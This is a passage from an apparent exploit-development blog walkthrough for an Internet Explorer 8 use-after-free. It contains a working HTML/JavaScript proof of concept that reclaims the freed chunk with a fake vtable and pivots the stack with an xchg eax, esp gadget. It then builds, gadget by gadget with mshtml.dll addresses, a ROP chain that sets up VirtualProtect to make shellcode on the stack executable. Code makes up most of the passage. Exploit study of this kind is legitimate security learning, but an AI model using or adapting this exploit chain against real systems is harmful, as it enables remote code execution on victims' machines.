So what happened here is that we loaded our heap chunk, that replaced the freed chunk, into ECX. The value in ECX points to our heap chunk. Our heap chunk is 0x68 bytes and consists of nothing but pointers to either the fake virtual function table (the 1st pointer) or a pointer to the string vftable(the 2nd pointer and so on). This can be seen in the image below (In WinDbg poi() will dereference what is within parentheses and display it).

This value in ECX, which is a pointer to our fake vtable, is also placed in EAX.

The value in EAX, at an offset of 0x70 is then placed into the EDX register. This value is then called.

As we can see, this is 42424242, which is the target function from our fake vftable! We have now successfully created our exploit primitive, and we can begin with a ROP chain, where we can exchange the EAX and ESP registers, since we control EAX, to obtain stack control and create a ROP chain.

I Mean, Come On, Did You Expect Me To Skip A Chance To Write My Own ROP Chain?

First off, before we start, it is well known IE8 contains some modules that do not depend on ASLR. For these purposes, this exploit will not take into consideration ASLR, but I hope that true ASLR bypasses through information leaks are something that I can take advantage of in the future, and I would love to document those findings in a blog post. However, for now, we must learn to walk before we can run. At the current state, I am just learning about browser exploitation, and I am not there yet. However, I hope to be soon!

It is a well known fact that, while leveraging the Java Runtime Environment, version 1.6 to be specific, an older version of MSVCR71.dll gets loaded into Internet Explorer 8, which is not compiled with ASLR. We could just leverage this DLL for our purposes. However, since there is already much documentation on this, we will go ahead and just disable ASLR system wide and constructing our own ROP chain, to bypass DEP, with another library that doesn’t have an “automated ROP chain”. Note again, this is the first post in a series where I hope to increasingly make things more modern. However, I am in my infancy in regards to learning browser exploitation, so we are going to start off by walking instead of running. This article describes how you can disable ASLR system wide.

Great. From here, we can leverage the rp++ utility to enumerate ROP gadgets for a given DLL. Let’s search in mshtml.dll, as we are already familiar with it!

To start, we know that our fake virtual function table is in EAX. We are not limited to a certain size here, as this table is pointed to by the first of 26 DWORDS (for a total of 0x68, or 104 bytes) that fills up the freed heap chunk. Because of this, we can exchange the EAX register (which we control) with the ESP register. This will give us stack control and allow us to start forging a ROP chain.

Parsing the ROP gadget output from rp++, we can see a nice ROP gadget exists

Let’s set update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable of 70 DWORDS (70 "functions")
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over EAX by making our virtual function point to a ROP gadget that exchanges EAX into ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by a DWORD, created from the HTML+TIME method to allocate 26 total DWORDS, for a total of 0x68 bytes, or 104 bytes in decimal, which is what we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable of 70 DWORDS (70 "functions")
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP gadget should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, and making changes to our ROP chain, then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then WinDbg to identify the correct child process and then debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable of 70 DWORDS (70 "functions")
// Start the table with ROP gadget that increases ESP (Since this fake vftable is now on the stack, we need to jump over the first 70 "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtaul function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep perform returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, and will be the last process listed in WinDbg under “System order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on “jump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191"
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
